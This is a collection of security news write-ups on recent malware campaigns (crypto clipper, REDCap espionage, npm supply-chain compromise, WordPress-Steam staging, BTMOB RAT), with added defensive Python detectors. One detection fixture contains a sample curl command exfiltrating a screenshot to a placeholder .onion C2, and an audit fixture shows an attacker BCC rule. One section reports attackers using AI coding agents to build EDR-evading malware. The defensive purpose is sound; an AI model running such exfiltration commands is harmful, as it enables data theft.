When a matching entry is detected, the malware silently replaces it with an attacker-controlled wallet address. The substituted addresses are chosen to share leading characters or numeric patterns with the original destination, reducing the likelihood that the swap is noticed during visual verification. The final stage of the infection emphasizes operational concealment and attacker control. 
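The two paragraphs above describe what the clipper looks for and how it disguises the substitution. The following clipboard-guard logic is an added example written for this post, not code from Microsoft's report: it classifies a clipboard string by the public prefix and length conventions of the formats named in the article (no checksum validation), and compares what was copied with what is about to be pasted so a same-kind-but-different address is flagged. The addresses in the test are constructed lookalikes, except the Bech32 one, which is the BIP173 test vector.

```python
"""Clipboard-guard logic for the wallet-address swap described above."""
import re

BASE58 = "[1-9A-HJ-NP-Za-km-z]"   # base58 alphabet: no 0, O, I, l
BECH32 = "[02-9ac-hj-np-z]"       # bech32 alphabet: no 1, b, i, o

# Classifiers for the formats named in the article (prefix + length only).
ADDRESS_PATTERNS = {
    "btc_legacy":  re.compile(f"^1{BASE58}{{25,34}}$"),
    "btc_p2sh":    re.compile(f"^3{BASE58}{{25,34}}$"),
    "btc_bech32":  re.compile(f"^bc1q{BECH32}{{38,58}}$"),
    "btc_taproot": re.compile(f"^bc1p{BECH32}{{58}}$"),
    "btc_wif":     re.compile(f"^[5KL]{BASE58}{{50,51}}$"),
    "eth_privkey": re.compile("^(0x)?[0-9a-fA-F]{64}$"),
    "tron":        re.compile(f"^T{BASE58}{{33}}$"),
    "monero":      re.compile(f"^[48]{BASE58}{{94}}$"),
}
SEED_WORD = re.compile("^[a-z]{3,8}$")  # BIP39 words are 3-8 lowercase letters


def classify(text):
    """Return the artifact kind of a clipboard string, or None."""
    s = text.strip()
    words = s.lower().split()
    if len(words) in (12, 24) and all(SEED_WORD.match(w) for w in words):
        return "seed_phrase"  # heuristic; a BIP39 wordlist check would be stricter
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(s):
            return kind
    return None


def shared_prefix_len(a, b):
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def assess_paste(copied, pasted):
    """Compare what the user copied with what is about to be pasted.

    A swap is suspected when both strings are artifacts of the same kind but
    differ. 'lookalike' records whether the substitute shares its first four
    or last three characters with the original, the trick the article says
    defeats visual verification.
    """
    c, p = copied.strip(), pasted.strip()
    kind = classify(c)
    if kind is None or kind != classify(p) or c == p:
        return {"swap_suspected": False, "kind": kind,
                "shared_prefix": 0, "lookalike": False}
    prefix = shared_prefix_len(c, p)
    return {"swap_suspected": True, "kind": kind, "shared_prefix": prefix,
            "lookalike": prefix >= 4 or c[-3:] == p[-3:]}


if __name__ == "__main__":
    # Constructed lookalike pair: same length, same first eight and last
    # three characters, different middle.
    original = "1ExampLeAddressForDemo9x4NqkZtP2sR"
    substitute = "1ExampLeSwapTargetDemo9x4NqkZtP2sR"
    print(assess_paste(original, substitute))
```

The guard is only as good as the hook that feeds it: a wallet front end or endpoint agent has to record the value at copy time and call `assess_paste` at paste time, because after the swap the clipboard alone no longer holds the original.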

By launching a renamed Tor executable in the background, the malware identifies the compromised host and registers it with external infrastructure without exposing direct network communications to the outside world. 

Upon enrollment, the infected system begins a continuous operational cycle, polling the command-and-control environment for instructions while simultaneously inspecting the clipboard contents at approximately half-second intervals to identify cryptocurrency seed phrases, private keys, and wallets. 

Command responses containing the EVAL directive also allow operators to execute attacker-supplied code in real time, expanding functionality or taking follow-on actions after compromise. 

Given this mix of scripting abuse, removable-media propagation, and Tor-based communications, Microsoft recommends prioritizing behavioral detection strategies, including monitoring PowerShell-driven screen capture activity, suspicious use of WScript and CScript, and script-engine processes spawning unexpected executables such as curl, cmd.exe, or PowerShell.

Besides disabling AutoRun and AutoPlay for removable media, Group Policy controls can be used to restrict execution of LNK files from USB devices, limit unnecessary access to scripting engines, and closely monitor clipboard and screen-capture behavior on systems involved in cryptocurrency or other sensitive financial transactions. 

Remote Code Execution Expands Malware Capabilities

Researchers found that the campaign's data collection goes beyond clipboard manipulation. Screenshots are captured and transferred to the command-and-control server through the native curl utility, giving operators continuous insight into victim activity. 

The malware also integrates remote code execution, extending the framework's scope beyond a conventional cryptocurrency clipper. Using the EVAL command, operators can instruct it to retrieve additional JavaScript payloads, save them locally as cfile files, and execute them directly on the compromised host. 

Essentially, this capability turns the infection into an on-demand access platform capable of deploying new functionality after the initial compromise. Because the malware is highly obfuscated and continuously evolving, Microsoft noted that behavioral indicators offer a more reliable detection opportunity than static signatures. Security teams should monitor for suspicious activity associated with wscript.exe and cscript.exe, unexpected executions of curl, PowerShell, and cmd.exe, and anomalous child-process chains. 

Additionally, connections to localhost:9050 and other signs of Tor proxy usage can indicate that a host has been compromised by this campaign. The campaign described by Microsoft illustrates how traditional malware techniques can be combined with anonymous infrastructure and scripting-based execution to create threats that are both difficult to detect and highly adaptable as cybercriminal operations continue to evolve. 
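The behavioral indicators listed in the last few paragraphs (script hosts spawning curl, cmd.exe or PowerShell; PowerShell-driven screen capture; connections to localhost:9050) translate directly into detection rules. The block below is an added example, not Microsoft's detection content: it runs three such rules over constructed telemetry in a simplified key=value form loosely modelled on Sysmon process-creation and network-connection fields. The `CopyFromScreen` string used as the screen-capture indicator is an assumption (it is the .NET call PowerShell screenshot one-liners typically use), not something the article names.

```python
"""Behavioral detections from the article, run over constructed telemetry."""
import re
from collections import Counter
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
UNEXPECTED_CHILDREN = {"curl.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
TOR_SOCKS_PORT = 9050  # the localhost port the article names

# Constructed sample events; not victim data. Paths with spaces are quoted.
SAMPLE_EVENTS = [
    r'type=process image=C:\Windows\explorer.exe parent=C:\Windows\System32\userinit.exe cmdline="explorer.exe"',
    r'type=process image=C:\Windows\System32\wscript.exe parent=C:\Windows\explorer.exe cmdline="wscript.exe C:\Users\Public\Documents\k3x9\loader.js"',
    r'type=process image=C:\Windows\System32\curl.exe parent=C:\Windows\System32\wscript.exe cmdline="curl.exe --socks5-hostname 127.0.0.1:9050 -s -F img=@shot.png http://c2-PLACEHOLDER.onion/"',
    r'type=process image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent=C:\Windows\System32\cscript.exe cmdline="powershell.exe -w hidden -c ...CopyFromScreen..."',
    r'type=process image=C:\Windows\System32\cmd.exe parent=C:\Windows\explorer.exe cmdline="cmd.exe /c dir"',
    r'type=network image=C:\Windows\System32\curl.exe dest_ip=127.0.0.1 dest_port=9050',
    r'type=network image="C:\Program Files\Browser\browser.exe" dest_ip=203.0.113.10 dest_port=443',
]

FIELD = re.compile(r'(\w+)=("(?:[^"]*)"|\S+)')


def parse_event(line):
    """Turn one key=value line into a dict, stripping quotes from values."""
    fields = {}
    for key, value in FIELD.findall(line):
        fields[key] = value[1:-1] if value.startswith('"') else value
    return fields


def detect(lines):
    """Return (rule, image) findings for every event that trips a rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        image = PureWindowsPath(ev.get("image", "")).name.lower()
        if ev.get("type") == "process":
            parent = PureWindowsPath(ev.get("parent", "")).name.lower()
            # Rule 1: a script host launching a tool it has no business running.
            if parent in SCRIPT_HOSTS and image in UNEXPECTED_CHILDREN:
                findings.append(("script_host_spawned_executable", image))
            # Rule 2: PowerShell-driven screen capture (assumed indicator).
            if image in {"powershell.exe", "pwsh.exe"} and \
                    "copyfromscreen" in ev.get("cmdline", "").lower():
                findings.append(("powershell_screen_capture", image))
        elif ev.get("type") == "network":
            # Rule 3: anything talking to the local Tor SOCKS port.
            if ev.get("dest_ip") in {"127.0.0.1", "::1", "localhost"} and \
                    ev.get("dest_port") == str(TOR_SOCKS_PORT):
                findings.append(("local_tor_socks_proxy", image))
    return findings


def summarize(lines):
    """Count findings per rule; an empty dict means nothing fired."""
    return dict(Counter(rule for rule, _image in detect(lines)))


if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule:32} {image}")
```

Rule 1 is the one with the best signal-to-noise in practice, since legitimate logon scripts rarely need curl or a second shell; rule 3 should be tuned to exclude hosts where a Tor client is expected.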

In environments characterized by removable media and digital asset transactions, the findings underscore the importance of monitoring behavioral indicators alongside conventional security controls. To identify attacks that prioritize stealth over scale, defenders must maintain visibility into unusual script activity, Tor-related communications, and clipboard manipulation.

China-Linked Cyber Espionage Group Secretly Harvested Research and Defense Emails from North American Institutions

A sophisticated cyber espionage campaign linked to China infiltrated research, healthcare, academic, and military organizations across North America, remaining undetected for more than a year while stealing sensitive information and defense-related communications.

According to a recent report from Google’s Threat Intelligence Group (GTIG), the campaign has been attributed with high confidence to a threat cluster identified as UNC6508. The attackers gained access through compromised REDCap (Research Electronic Data Capture) servers and later leveraged built-in Google Workspace features to quietly collect targeted emails.

The threat actor and its custom malware, known as INFINITERED, were previously highlighted by Google in February during a broader assessment of state-sponsored attacks targeting the defense industry. While the affected organizations were not publicly named, the victims reportedly included healthcare providers, universities, military medical institutions, advocacy organizations, and regulatory agencies in the United States and Canada. Google stated that it alerted impacted entities and took action against the attackers’ infrastructure.

The attackers targeted externally accessible REDCap servers, a widely used platform that helps hospitals, research institutions, and universities manage study data and databases.

Although Google has not identified the precise method used to gain initial access, nor linked the activity to a specific vulnerability or CVE, investigators observed the group scanning older REDCap versions known to contain security weaknesses.

Roughly three months after breaching the servers, UNC6508 deployed INFINITERED, a customized malware strain designed to modify REDCap system files. The malware ensured long-term persistence by embedding itself into the platform’s update process, allowing malicious code to survive future software upgrades.

INFINITERED also captured usernames and passwords entered through REDCap login portals and stored the stolen credentials in encrypted form within local databases. Additionally, the malware functioned as a backdoor, accepting commands through HTTP cookies and executing them whenever users loaded web pages.

Researchers traced the earliest known compromise to September 2023, with malicious activity continuing through November 2025. After establishing a foothold, the attackers conducted network reconnaissance, collected database and service account credentials, and eventually escalated privileges to obtain domain administrator access.

Rather than deploying a separate data-exfiltration tool, the attackers exploited an existing Google Workspace administrative capability known as content compliance rules.

These rules are typically used by organizations to monitor emails for specific keywords and automatically apply actions such as forwarding or copying messages. UNC6508 created a malicious rule named "Patroit" that monitored nearly 150 keywords, email addresses, and search terms associated with its intelligence-gathering objectives.

Whenever an email matched the predefined criteria, Google Workspace automatically sent a hidden copy to an attacker-controlled Gmail account. Google has since disabled the account involved in the operation.

This technique allowed the threat actors to collect sensitive communications without installing malware on mail servers or generating suspicious network traffic. Instead, they relied entirely on legitimate cloud-based functionality to siphon information.

While email-forwarding rule abuse is already recognized within the MITRE ATT&CK framework, GTIG noted that using domain-level content compliance rules for espionage represented a previously unseen tactic among China-linked cyber actors.

Analysis of the monitoring rules revealed that UNC6508 was particularly interested in subjects related to geopolitical strategy, military technologies and equipment, artificial intelligence, autonomous and uncrewed systems, offensive cyber operations, and medical research.

One especially notable keyword was "chikungunya," a mosquito-borne disease linked to a significant outbreak in China's Guangdong province during 2025, suggesting the group's collection interests extended into public health and epidemiological research.

Security teams are advised to immediately update internet-facing REDCap servers and completely remove outdated software versions. Because REDCap allows multiple versions to operate simultaneously, legacy installations can create opportunities for downgrade attacks that exploit known vulnerabilities.

Organizations should also review Google Workspace and other cloud email environments for unusual content compliance rules, unauthorized mail forwarding settings, and external BCC destinations. Administrative audit logs should be examined to identify when rule changes occurred and who made them.
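The review advised above (unusual content compliance rules, external forwarding or BCC destinations, and who changed what, when) can be scripted against an export of admin audit records. The block below is an added example, not Google's or GTIG's code: the record shape is a simplified, hypothetical export format rather than the Admin SDK schema, the organisation domain is constructed, and the one record modelled on the "Patroit" rule uses a placeholder external mailbox.

```python
"""Review mail-rule audit records for the content-compliance abuse described above."""
from datetime import datetime, timezone

ORG_DOMAINS = {"example-hospital.org"}  # constructed organisation domain

# Constructed audit records in a hypothetical export shape (not the Google
# Admin SDK's field names). The second record mimics the reported "Patroit"
# rule: a BCC to an external mailbox, ~150 match terms, created off-hours.
SAMPLE_AUDIT = [
    {"time": "2025-03-02T11:04:19Z", "actor": "it-admin@example-hospital.org",
     "event": "rule_created", "setting": "content_compliance",
     "rule_name": "DLP - patient identifiers", "action": "quarantine",
     "recipients": [], "term_count": 6},
    {"time": "2025-06-14T02:17:51Z", "actor": "svc-backup@example-hospital.org",
     "event": "rule_created", "setting": "content_compliance",
     "rule_name": "Patroit", "action": "bcc",
     "recipients": ["ATTACKER-PLACEHOLDER@gmail.com"], "term_count": 148},
    {"time": "2025-06-20T09:30:00Z", "actor": "it-admin@example-hospital.org",
     "event": "rule_changed", "setting": "routing",
     "rule_name": "Archive copy", "action": "forward",
     "recipients": ["archive@example-hospital.org"], "term_count": 0},
]


def external_recipients(recipients, org_domains):
    """Addresses whose domain is not one of ours."""
    return [r for r in recipients
            if r.rsplit("@", 1)[-1].lower() not in org_domains]


def audit_mail_rules(records, org_domains=ORG_DOMAINS):
    """One finding per record that copies or forwards mail externally or
    monitors an unusually large term list. Each finding keeps the actor and
    timestamp so the 'who changed it, and when' question is answered."""
    findings = []
    for rec in records:
        reasons = []
        ext = external_recipients(rec.get("recipients", []), org_domains)
        if rec.get("action") in {"bcc", "forward"} and ext:
            reasons.append(f"external {rec['action']} to {', '.join(ext)}")
        if rec.get("term_count", 0) >= 50:
            reasons.append(f"{rec['term_count']} match terms")
        when = datetime.fromisoformat(rec["time"].replace("Z", "+00:00"))
        hour = when.astimezone(timezone.utc).hour
        if reasons and not 7 <= hour < 19:
            reasons.append("changed outside business hours (UTC)")
        if reasons:
            findings.append({"rule": rec["rule_name"], "actor": rec["actor"],
                             "time": rec["time"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_mail_rules(SAMPLE_AUDIT):
        print(f"{f['time']} {f['actor']} rule={f['rule']!r}: {'; '.join(f['reasons'])}")
```

The term-count threshold is a heuristic; a legitimate DLP rule can be long, which is why the finding carries all its reasons rather than a single verdict, so a reviewer can weigh an internal archive rule differently from an external BCC created by a service account at two in the morning.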

Google has also published indicators of compromise associated with INFINITERED, which defenders can use to search for signs of intrusion within their environments. Implementing phishing-resistant multi-factor authentication (MFA) for administrator accounts is another critical step, as the email theft operation ultimately depended on obtaining elevated administrative privileges.

Although investigators have not yet determined exactly how UNC6508 initially compromised the REDCap servers, the campaign demonstrates how legitimate cloud administration features can be weaponized once attackers gain sufficient access. As a result, organizations must monitor not only malware and network activity but also the misuse of trusted enterprise tools that can quietly facilitate data theft.

AI-Assisted Malware Lab Found Testing Ways to Evade Security Tools, Sophos Reports

Researchers at cybersecurity firm Sophos have uncovered a malware development framework that uses artificial intelligence tools to speed up the creation and testing of ransomware-related software designed to avoid detection by security products.

The investigation began after Sophos analysts discovered suspicious files on a customer system. What initially appeared to be a collection of penetration-testing tools soon revealed signs of criminal activity, including references to ransom notes and organizations listed on ransomware leak sites.

According to Sophos, the framework combines traditional attack tools with AI-assisted development workflows. Researchers found evidence that the operators used coding assistants such as Cursor and Claude Opus during different stages of development, including writing code, reviewing results, refining payloads, and researching techniques that could help malware evade security controls.

One of the framework's primary goals was to bypass Endpoint Detection and Response (EDR) platforms. These security products are designed to identify malicious activity on computers and servers, often detecting attacks that traditional antivirus software might miss.

The toolkit contained several components intended to reduce the chances of detection. Among them were customized Cobalt Strike profiles that made malicious network traffic resemble ordinary web browsing activity, communication channels that routed commands through Telegram, and malware development scripts capable of injecting malicious code into legitimate Windows applications while allowing those programs to continue functioning normally.

Researchers also identified the use of a Cloudflare Worker that acted as an intermediary between infected systems and attacker-controlled infrastructure. This setup can make it more difficult for defenders to identify the true location of command-and-control servers.

A particularly notable feature of the framework was an automated Active Directory discovery system. Active Directory is widely used in enterprise networks to manage users, computers, permissions, and other resources. Because it contains valuable information about an organization's internal structure, attackers frequently attempt to map Active Directory environments after gaining access to a network.

Sophos found that the discovery process relied on a series of AI-assisted agents that gathered information, assessed results, selected follow-up actions, and continued the investigation of the network. Rather than requiring a human operator to manually perform every step, parts of the reconnaissance process could be carried out through predefined automated workflows.

The framework itself appeared to operate through multiple specialized AI agents assigned to different tasks. Sophos reported that one agent coordinated the overall development process while others focused on testing, documentation, operational security improvements, virtual machine deployment, proxy testing, and malware evaluation.

Researchers also discovered that some agents had been tasked with examining publicly available security research. The system collected information from technical reports and research publications, extracted details about detection-evasion methods, mapped those techniques to the MITRE ATT&CK framework, recreated testing environments, and documented the results.

At the center of the operation was a Python-based payload generation tool. This component produced malware written primarily in Rust and Go while combining encryption, execution techniques, and anti-analysis measures intended to make detection more difficult. Sophos observed nearly 80 generated modules being tested against more than 70 separate evasion methods.

The malware was evaluated in laboratory environments against security products from Sophos, CrowdStrike, and Microsoft. Researchers noted that repeated testing and revision cycles appeared to improve the success rate of many payloads. However, they also observed inconsistencies between some reported results and actual testing outcomes, leaving questions about the accuracy of certain internal performance claims.

Despite the extensive use of artificial intelligence during development, Sophos found no indication that AI was embedded within deployed malware or operating independently on victim systems. The technology was primarily used to accelerate the research, testing, and refinement process while human operators remained responsible for directing the activity.

The findings provide another example of how threat actors are incorporating AI into existing workflows. Rather than introducing entirely new attack methods, these tools appear to be helping attackers shorten the time needed to transform publicly available security research into functioning malware capable of challenging modern security defenses.

Red Hat Investigates npm Package Compromise After Malware Found in Official Repository

Security researchers have identified malicious code in dozens of packages distributed through Red Hat's official @redhat-cloud-services namespace on npm after attackers gained unauthorized access to the repository.

The incident was first reported by researchers at Aikido Security, who found that software packages published through the trusted Red Hat namespace had been modified to include malware capable of collecting credentials from developer environments. Because the affected namespace is used for legitimate Red Hat cloud-related packages, developers may have installed the compromised versions without suspecting unauthorized changes.

According to researchers, more than 30 package versions were affected. Several remained available for download when the activity was initially disclosed, creating a risk for organizations that automatically pull dependencies into development workflows.

Technical analysis showed that the malicious code was designed to run during package installation. This means exposure could occur as soon as a package is installed, even if the software itself is never executed inside an application.

Researchers found that the malware searched infected systems for authentication data commonly used by developers and cloud administrators. The targeted information reportedly included GitHub Actions secrets, npm access tokens, Kubernetes credentials, Vault secrets, and other cloud-service authentication material that could provide access to source code repositories, deployment environments, and internal infrastructure.

The malware also contained mechanisms intended to expand the compromise beyond the initial victim. If credentials with sufficient privileges were discovered, the malicious code could attempt to publish altered packages through repositories or accounts available to the infected environment. This behavior could allow attackers to use one compromised system as a stepping stone into additional software projects.

Investigators further observed that stolen information was encrypted before being transmitted from infected systems. Reports indicate that the malware included backup methods for data exfiltration, including the ability to use compromised GitHub repositories if its primary communication channel became unavailable.

Researchers noted signs that the incident may have involved CI/CD infrastructure. Continuous Integration and Continuous Delivery systems automate software building, testing, and deployment, making them attractive targets because a compromise can provide access to multiple projects simultaneously. Evidence reviewed by researchers suggested that GitHub Actions OpenID Connect workflows may have been involved in publishing the affected packages.

The exact method used to gain access to the Red Hat namespace remains under investigation. Researchers have not publicly attributed the initial compromise to a specific technique, although they believe unauthorized access to publishing credentials likely played a role.

Security firms examining the incident linked the malware to a variant of "Shai-Hulud," a credential-stealing program that has appeared in recent software supply-chain investigations. Researchers noted that code associated with the malware has circulated publicly, increasing the likelihood that similar attacks could be adopted by multiple threat actors.

Following notification of the issue, Red Hat removed the affected packages and began an internal investigation. In a public statement, the company said the compromised packages were intended for internal development purposes and were not distributed to customers through Red Hat production services. The company also stated that it had not identified evidence of impact to customer environments, partner systems, or production infrastructure at the time of its investigation.

Security experts recommend that any organization or developer who installed affected package versions review their systems immediately. Response measures should include rotating credentials, examining CI/CD environments for unauthorized activity, reviewing repository permissions, and checking software dependencies for indicators associated with the compromise.
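Because the malicious code ran at install time, the dependency check recommended above starts with one question: which installed packages declare install-time lifecycle scripts at all, and which of those sit in the affected scope? The audit script below is an added example, not Red Hat's or Aikido's tooling; the node_modules tree it builds is constructed, and the package names in it are made up rather than the real affected versions.

```python
"""Audit a node_modules tree for packages that run code at install time."""
import json
import tempfile
from pathlib import Path

# npm lifecycle hooks that execute during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def find_install_hooks(node_modules, scope=None):
    """Return (package_name, version, {hook: command}) for every package
    under node_modules that declares an install-time script. With scope set
    (e.g. '@redhat-cloud-services') only packages in that scope are listed.
    Nested node_modules directories are included, so transitive
    dependencies are covered too."""
    results = []
    for pkg_json in sorted(Path(node_modules).rglob("package.json")):
        try:
            meta = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # fixtures and partial files are noise, not findings
        name = meta.get("name", "")
        if scope and not name.startswith(scope + "/"):
            continue
        scripts = meta.get("scripts") or {}
        hooks = {h: cmd for h, cmd in scripts.items() if h in LIFECYCLE_HOOKS}
        if hooks:
            results.append((name, meta.get("version", "?"), hooks))
    return results


def build_sample_tree():
    """Create a constructed node_modules tree with three fake packages."""
    root = Path(tempfile.mkdtemp(prefix="nm_audit_")) / "node_modules"
    packages = {
        "@redhat-cloud-services/example-a": {
            "version": "1.2.3", "scripts": {"postinstall": "node scripts/setup.js"}},
        "@redhat-cloud-services/example-b": {
            "version": "2.0.0", "scripts": {"build": "tsc"}},
        "other-lib": {
            "version": "0.9.1", "scripts": {"preinstall": "node-gyp rebuild"}},
    }
    for name, meta in packages.items():
        pkg_dir = root / name
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(
            json.dumps({"name": name, **meta}), encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    for name, version, hooks in find_install_hooks(build_sample_tree()):
        print(f"{name}@{version}: {hooks}")
```

A package with a postinstall hook is not automatically malicious (native modules legitimately build themselves this way), but every entry in the list is code that ran on the developer's machine without the application ever being executed. For CI systems that pull dependencies automatically, npm's `ignore-scripts` setting (`npm install --ignore-scripts`) removes this execution path entirely, at the cost of having to build native dependencies explicitly.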

The incident illustrates a recurring challenge in modern software development: trust placed in widely used package repositories can become a point of failure when an attacker gains access to a legitimate publishing channel. When that occurs, malicious code can reach downstream users through routine software updates rather than through traditional intrusion methods. 

WordPress Malware Campaign Hides Payloads in Steam Profiles

A WordPress malware campaign that hides its payloads in Steam profiles ranks among the most unconventional attack chains seen recently. Nearly 2,000 WordPress websites were infected with malware that relies on Steam Community profile comments to hide command-and-control data, according to the GoDaddy security engineers who uncovered the campaign. This unusual attack chain demonstrates how threat actors increasingly exploit legitimate platforms to evade traditional detection methods. 

The technical sophistication lies in how the malware uses invisible Unicode characters to encode its payload. The threat actor uses six specific invisible Unicode characters: Zero-width non-joiner (U+200C), Zero-width joiner (U+200D), Function application (U+2061), Invisible times (U+2062), Invisible separator (U+2063), and Invisible plus (U+2064). The decoder ignores visible characters and maps invisible ones to corresponding numbers, then converts them to binary representation to reconstruct bytes. This encoding allows binary data to embed within normal-looking text, with visible characters serving as camouflage while invisible characters carry the actual payload. 

Since the campaign was first uncovered in July 2025, researchers have found the malware on approximately 1,980 WordPress websites, though the initial infection vector remains unclear. Attackers likely breached websites through stolen admin logins, compromised FTP/SFTP credentials, vulnerable WordPress themes or plugins, or supply-chain compromises. The first-stage malware uses WordPress page loads to reach specific Steam profiles and extract text from benign-looking comments that sometimes use ASCII art to disguise the malicious text. The decoded payload builds a hello-mywordl[.]info URL serving JavaScript code that is injected into every frontend WordPress page. 

GoDaddy describes several evasion mechanisms including obfuscated strings using octal and hex escapes, randomized function names, fake disabled logging code, and standard WordPress APIs that blend with normal activity. The campaign pairs this encoding with a server-side backdoor enabling attackers to remotely rewrite any plugin or theme file using a simple POST request with the right cookie, meaning even removed injected scripts can reinstall. This dual approach makes the malware particularly persistent and difficult to eliminate completely. 

Site owners can defend by checking for Steam Community URL references, suspicious external JavaScript injections, outbound connections from WordPress servers to Steam, and unexpected scripts loading from domains like hello-mywordl[.]info. Other indicators include invisible Unicode characters, suspicious transient_caption cache entries, disabled SSL verification in cURL requests, and POST requests containing malware authentication cookies or the new_code parameter. This attack underscores the importance of monitoring unusual outbound connections and implementing comprehensive security scanning for invisible character anomalies in web content.
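Both the invisible-character encoding described earlier and the indicator list in the paragraph above lend themselves to a file and text scanner. The block below is an added example, not GoDaddy's detection content: it looks for the string indicators the article names (Steam Community URLs, the hello-mywordl[.]info domain written defanged or plain, disabled cURL SSL verification, the new_code POST parameter, and transient_caption cache entries) and separately counts the six invisible code points. The mapping of those code points to the digits 0 to 5 follows the order the article lists them in, which is an assumption, since the report as summarised here does not give the exact numbering; the sample plugin fragment and Steam comment are constructed and contain indicator strings only.

```python
"""Scan WordPress files and fetched comment text for the indicators above."""
import re

# The six invisible code points the article lists, in the order given there.
INVISIBLE = "\u200c\u200d\u2061\u2062\u2063\u2064"

# String indicators taken from the article. The C2 domain pattern matches
# both the defanged form used in the report and the plain form.
STRING_INDICATORS = {
    "steam_community_url": re.compile(r"steamcommunity\.com", re.I),
    "known_c2_domain": re.compile(r"hello-mywordl\[?\.\]?info", re.I),
    "curl_ssl_verification_disabled": re.compile(
        r"CURLOPT_SSL_VERIFY(PEER|HOST)\s*,\s*(false|0)\b", re.I),
    "backdoor_post_parameter": re.compile(r"""\$_POST\s*\[\s*['"]new_code['"]\s*\]"""),
    "transient_caption_cache": re.compile(r"transient_caption"),
}


def extract_invisible(text):
    """First step of the decoder the article describes: ignore visible
    characters and map each invisible one to a number (0-5, by list order;
    the exact numbering is an assumption)."""
    return [INVISIBLE.index(ch) for ch in text if ch in INVISIBLE]


def scan(text, min_invisible=8):
    """Return the names of every indicator found in text, in a fixed order."""
    findings = [name for name, pat in STRING_INDICATORS.items() if pat.search(text)]
    # A handful of zero-width joiners can be legitimate (emoji sequences,
    # some scripts); a comment carrying dozens of them is not.
    if len(extract_invisible(text)) >= min_invisible:
        findings.append("invisible_unicode_payload")
    return findings


# Constructed sample inputs: indicator strings only, not the campaign's code.
SAMPLE_PLUGIN_FILE = r"""<?php
$u = 'https://steamcommunity.com/id/PLACEHOLDER';
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
if (isset($_POST['new_code'])) { $x = 1; }
set_transient('transient_caption', $x);
"""
SAMPLE_STEAM_COMMENT = "gg :)" + "\u200c\u200d\u2062\u2061" * 4 + " nice profile"

if __name__ == "__main__":
    print("plugin file :", scan(SAMPLE_PLUGIN_FILE))
    print("comment     :", scan(SAMPLE_STEAM_COMMENT))
    print("digits      :", extract_invisible(SAMPLE_STEAM_COMMENT))
```

Pointing `scan` at every file under wp-content/plugins and wp-content/themes covers the server-side backdoor, while running it over the text the site fetches from Steam covers the staging channel; the `extract_invisible` output is what an analyst would feed into a full decoder once the campaign's binary packing is known.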

Researchers Uncover BTMOB Malware Capable of Taking Over Android Phones

In the Android threat landscape, a new malware operation has been rapidly expanding, reducing the barriers to entry for cybercriminals while simultaneously enhancing their offensive capabilities significantly. Security researchers have identified BTMOB, an Android remote access trojan (RAT) derived from the SpySolr malware family, as an emerging malware-as-a-service platform that enables operators to remotely monitor, manipulate, and control compromised devices with minimal technical expertise. 

The malware is distributed primarily through phishing campaigns and fraudulent applications masquerading as legitimate online services. It combines extensive device-takeover functionality with a no-code campaign-building framework that lets operators customise lures, automate deployment, and target multiple regions.

BTMOB's evolution reflects a broader shift in the mobile threat landscape, where commercially packaged malware platforms are turning advanced Android attack capabilities into scalable cybercrime services available to a wider range of threat actors. The malware's reach is closely tied to its commercialisation model: rather than being operated by a single threat group, BTMOB is sold as a subscription-based cybercrime service with public-facing marketing channels intended to attract customers. 

The malware is marketed through a dedicated surface-web portal that directs buyers to a Telegram-based operator. Additional marketing is conducted via social media accounts on X and Instagram. The commercialisation of the malware provides valuable insight into how its operators have transformed a technical threat into a structured cybercrime service designed for scale. 

Access to the platform has reportedly been advertised for approximately $5,000, along with recurring support fees. Researchers note that the cost remains relatively low compared with the potential returns from successful fraud operations, making the service attractive to a broader range of cybercriminals. Further aggravating the risk is the fact that the malware also circulates outside the commercial ecosystem. 

BTMOB-related files appeared briefly on a dark web forum in January of 2026 as a free download before disappearing, showing how malware distributed through commercial channels can rapidly spread through unauthorised sharing and reselling networks. Consequently, security teams are faced with an increasingly dynamic threat, as new builds and modified payloads emerge more rapidly than traditional detection mechanisms can react. 

Beyond its commercial appeal, BTMOB's effectiveness ultimately depends on compromising devices at scale through carefully crafted social engineering campaigns, and it relies heavily on phishing-driven infection chains designed to exploit user trust. 

The threat actors often redirect targets to counterfeit websites masquerading as streaming platforms, cryptocurrency services, or other widely recognised online brands, which in turn lead to fraudulent application repositories hosting malicious Android applications. Attacks tailored to local institutions and government entities have also been observed, including operations impersonating Argentine tax and public-sector agencies as lures. 

Once sideloaded, the malware seeks elevated privileges by abusing Android's Accessibility Services, which lets it silently grant itself additional permissions without further user action. With these privileges, BTMOB establishes communication with attacker-controlled command-and-control infrastructure, allowing the operator to remotely manage the device, maintain persistent access, steal credentials, and conduct other malicious activity. A significant challenge for defenders is the commercial framework underpinning BTMOB.

A report by security researchers indicates that the malware's pricing structure includes a lifetime license that costs approximately $5,000 plus recurring support fees, which are relatively modest expenditures when compared to the potential financial gains that could be realized from successful credential theft and fraud. These economic factors have accelerated the malware's adoption across underground communities, expanding its operational reach beyond highly skilled threat actors.

In January 2026, a dark web forum briefly advertised BTMOB-related files as free downloads before going offline. The incident illustrates how commercially distributed malware can quickly spread beyond its intended customer base through resale networks, private exchanges, and closed underground communities. 

Competitors may well replicate the successful design elements of the original malware, borrowing the campaign-management features and payload-customisation mechanisms that facilitate large-scale operations even where the original malware is inaccessible. This combination of rapid distribution and continuous modification makes it harder for defenders to track the malware's evolution, producing an increasingly fluid threat environment in which payloads, infrastructure, and delivery techniques change faster than conventional detection strategies can adapt.

ESET currently identifies MSIL/BtmobRat as the primary malware framework, while associated Android variants have been detected under several classifications, including Android/Spy.Agent.EED, Android/Spy.Agent.EIJ, and Android/Spy.Agent.EIK. The malware has already demonstrated its capacity for rapid evolution: a Cyble analysis from February 2025 observed approximately fifteen distinct samples of BTMOB v2.5 within a relatively short timeframe. 

